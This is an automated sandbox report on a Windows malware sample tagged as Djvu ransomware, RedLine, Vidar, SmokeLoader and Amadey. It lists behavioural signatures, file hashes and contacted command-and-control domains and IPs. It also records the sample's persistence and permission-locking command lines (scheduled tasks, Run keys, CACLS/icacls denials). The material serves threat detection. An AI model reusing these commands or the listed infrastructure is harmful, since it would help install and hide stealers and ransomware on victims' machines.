Malware Analysis Report

2025-01-18 06:22

Sample ID 231018-wqdhjahd6z
Target NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe
SHA256 779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64
Tags
amadey djvu redline smokeloader vidar logsdiller cloud (tg: @logsdillabot) summ backdoor collection discovery evasion infostealer persistence ransomware stealer themida trojan glupteba pub1 dropper loader spyware upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64

Threat Level: Known bad

The file NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe was found to be: Known bad.

Malicious Activity Summary

amadey djvu redline smokeloader vidar logsdiller cloud (tg: @logsdillabot) summ backdoor collection discovery evasion infostealer persistence ransomware stealer themida trojan glupteba pub1 dropper loader spyware upx

RedLine

Glupteba payload

Glupteba

Detected Djvu ransomware

Djvu Ransomware

Amadey

Vidar

SmokeLoader

RedLine payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Modifies Windows Firewall

Stops running service(s)

UPX packed file

Executes dropped EXE

Checks computer location settings

Modifies file permissions

Deletes itself

Checks BIOS information in registry

Loads dropped DLL

Themida packer

Accesses Microsoft Outlook profiles

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Checks whether UAC is enabled

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Enumerates physical storage devices

Program crash

Unsigned PE

Creates scheduled task(s)

outlook_win_path

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious behavior: GetForegroundWindowSpam

Modifies data under HKEY_USERS

Checks SCSI registry key(s)

outlook_office_path

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of UnmapMainImage

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-18 18:07

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-18 18:07

Reported

2023-10-18 18:13

Platform

win7-20230831-en

Max time kernel

151s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe"

Signatures

Amadey

trojan amadey

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\8B02.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\8B02.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\8B02.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\2259af8a-cce1-4d72-80ee-fa37b1e9acb5\\8363.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\8363.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\8B02.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8B02.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\BD89.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\BD89.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\BD89.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BD89.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1248 wrote to memory of 2976 N/A N/A C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 1248 wrote to memory of 2976 N/A N/A C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 1248 wrote to memory of 2976 N/A N/A C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 1248 wrote to memory of 2976 N/A N/A C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\8363.exe C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\8363.exe C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\8363.exe C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\8363.exe C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\8363.exe C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\8363.exe C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\8363.exe C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\8363.exe C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\8363.exe C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\8363.exe C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 2976 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\8363.exe C:\Users\Admin\AppData\Local\Temp\8363.exe
PID 1248 wrote to memory of 2628 N/A N/A C:\Users\Admin\AppData\Local\Temp\8B02.exe
PID 1248 wrote to memory of 2628 N/A N/A C:\Users\Admin\AppData\Local\Temp\8B02.exe
PID 1248 wrote to memory of 2628 N/A N/A C:\Users\Admin\AppData\Local\Temp\8B02.exe
PID 1248 wrote to memory of 2628 N/A N/A C:\Users\Admin\AppData\Local\Temp\8B02.exe
PID 1248 wrote to memory of 2512 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1248 wrote to memory of 2512 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1248 wrote to memory of 2512 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1248 wrote to memory of 2512 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1248 wrote to memory of 2512 N/A N/A C:\Windows\system32\regsvr32.exe
PID 2512 wrote to memory of 3056 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2512 wrote to memory of 3056 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2512 wrote to memory of 3056 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2512 wrote to memory of 3056 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2512 wrote to memory of 3056 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2512 wrote to memory of 3056 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2512 wrote to memory of 3056 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1248 wrote to memory of 1988 N/A N/A C:\Users\Admin\AppData\Local\Temp\B510.exe
PID 1248 wrote to memory of 1988 N/A N/A C:\Users\Admin\AppData\Local\Temp\B510.exe
PID 1248 wrote to memory of 1988 N/A N/A C:\Users\Admin\AppData\Local\Temp\B510.exe
PID 1248 wrote to memory of 1988 N/A N/A C:\Users\Admin\AppData\Local\Temp\B510.exe
PID 1248 wrote to memory of 1972 N/A N/A C:\Users\Admin\AppData\Local\Temp\BD89.exe
PID 1248 wrote to memory of 1972 N/A N/A C:\Users\Admin\AppData\Local\Temp\BD89.exe
PID 1248 wrote to memory of 1972 N/A N/A C:\Users\Admin\AppData\Local\Temp\BD89.exe
PID 1248 wrote to memory of 1972 N/A N/A C:\Users\Admin\AppData\Local\Temp\BD89.exe
PID 1248 wrote to memory of 1476 N/A N/A C:\Users\Admin\AppData\Local\Temp\D06E.exe
PID 1248 wrote to memory of 1476 N/A N/A C:\Users\Admin\AppData\Local\Temp\D06E.exe
PID 1248 wrote to memory of 1476 N/A N/A C:\Users\Admin\AppData\Local\Temp\D06E.exe
PID 1248 wrote to memory of 1476 N/A N/A C:\Users\Admin\AppData\Local\Temp\D06E.exe
PID 1988 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\B510.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\B510.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\B510.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\B510.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\B510.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\B510.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\B510.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\B510.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\B510.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\B510.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\B510.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1988 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\B510.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2680 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\8363.exe C:\Windows\SysWOW64\icacls.exe
PID 2680 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\8363.exe C:\Windows\SysWOW64\icacls.exe
PID 2680 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\8363.exe C:\Windows\SysWOW64\icacls.exe
PID 2680 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\8363.exe C:\Windows\SysWOW64\icacls.exe
PID 1248 wrote to memory of 1440 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 1248 wrote to memory of 1440 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 1248 wrote to memory of 1440 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 1248 wrote to memory of 1440 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 1248 wrote to memory of 1440 N/A N/A C:\Windows\SysWOW64\explorer.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe"

C:\Users\Admin\AppData\Local\Temp\8363.exe

C:\Users\Admin\AppData\Local\Temp\8363.exe

C:\Users\Admin\AppData\Local\Temp\8363.exe

C:\Users\Admin\AppData\Local\Temp\8363.exe

C:\Users\Admin\AppData\Local\Temp\8B02.exe

C:\Users\Admin\AppData\Local\Temp\8B02.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\A6AD.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\A6AD.dll

C:\Users\Admin\AppData\Local\Temp\B510.exe

C:\Users\Admin\AppData\Local\Temp\B510.exe

C:\Users\Admin\AppData\Local\Temp\BD89.exe

C:\Users\Admin\AppData\Local\Temp\BD89.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\D06E.exe

C:\Users\Admin\AppData\Local\Temp\D06E.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\2259af8a-cce1-4d72-80ee-fa37b1e9acb5" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

"C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\8363.exe

"C:\Users\Admin\AppData\Local\Temp\8363.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\8363.exe

"C:\Users\Admin\AppData\Local\Temp\8363.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build2.exe

"C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build2.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build2.exe

"C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build2.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build3.exe

"C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build3.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build3.exe

"C:\Users\Admin\AppData\Local\2d8a583c-c7d6-47f2-9d05-23133cdb8e97\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 onualituyrs.org udp
US 8.8.8.8:53 sumagulituyo.org udp
US 34.94.245.237:80 sumagulituyo.org tcp
US 8.8.8.8:53 snukerukeutit.org udp
US 104.198.2.251:80 snukerukeutit.org tcp
US 8.8.8.8:53 lightseinsteniki.org udp
SG 34.143.166.163:80 lightseinsteniki.org tcp
US 8.8.8.8:53 liuliuoumumy.org udp
SG 34.143.166.163:80 liuliuoumumy.org tcp
US 8.8.8.8:53 stualialuyastrelia.net udp
RU 91.215.85.17:80 stualialuyastrelia.net tcp
US 8.8.8.8:53 api.2ip.ua udp
US 188.114.96.0:443 api.2ip.ua tcp
RU 79.137.192.18:80 79.137.192.18 tcp
US 8.8.8.8:53 alayyadcare.com udp
PS 213.6.54.58:443 alayyadcare.com tcp
PS 213.6.54.58:443 alayyadcare.com tcp
US 8.8.8.8:53 montereyclub.org udp
US 172.67.196.133:443 montereyclub.org tcp
US 8.8.8.8:53 loveperry.org udp
US 8.8.8.8:53 stalagmijesarl.com udp
US 95.214.26.31:80 stalagmijesarl.com tcp
RU 79.137.192.18:80 79.137.192.18 tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 188.114.96.0:443 api.2ip.ua tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 8.8.8.8:53 transfer.sh udp
US 8.8.8.8:53 colisumy.com udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 zexeq.com udp
US 8.8.8.8:53 apps.identrust.com udp
NL 23.72.252.139:80 apps.identrust.com tcp
KR 175.120.254.9:80 zexeq.com tcp
MX 189.169.91.61:80 colisumy.com tcp
BG 171.22.28.236:38306 tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
KR 175.120.254.9:80 zexeq.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp
US 95.214.26.31:80 stalagmijesarl.com tcp

Files

memory/2016-1-0x0000000000290000-0x0000000000390000-memory.dmp

memory/2016-2-0x0000000000400000-0x00000000007CD000-memory.dmp

memory/2016-3-0x00000000001B0000-0x00000000001BB000-memory.dmp

memory/1248-4-0x0000000002AA0000-0x0000000002AB6000-memory.dmp

memory/2016-5-0x0000000000400000-0x00000000007CD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8363.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

C:\Users\Admin\AppData\Local\Temp\8363.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

memory/2976-20-0x0000000002080000-0x0000000002111000-memory.dmp

memory/2976-21-0x0000000002080000-0x0000000002111000-memory.dmp

memory/2976-22-0x0000000002120000-0x000000000223B000-memory.dmp

\Users\Admin\AppData\Local\Temp\8363.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

C:\Users\Admin\AppData\Local\Temp\8363.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
SHA256 515eaeffdbc3065d08c165706e8be7a07dc778e2548b01ea566ed6308a3ecbf5
SHA512 ce9877a36012f2a06559ce0dafedec357884291ecc801f292429e0264d0e844b677455a8f800bd9ec1e99ae8c341f15fc2306cde6a6ed3d8d24a1a7e23f938cc

memory/2680-26-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2680-28-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2976-31-0x0000000002080000-0x0000000002111000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8363.exe

MD5 22a70a0b71715402d1a4c2b912fa901f
SHA1 d5373bfe847966630647e1b416c00c2075c8d41d
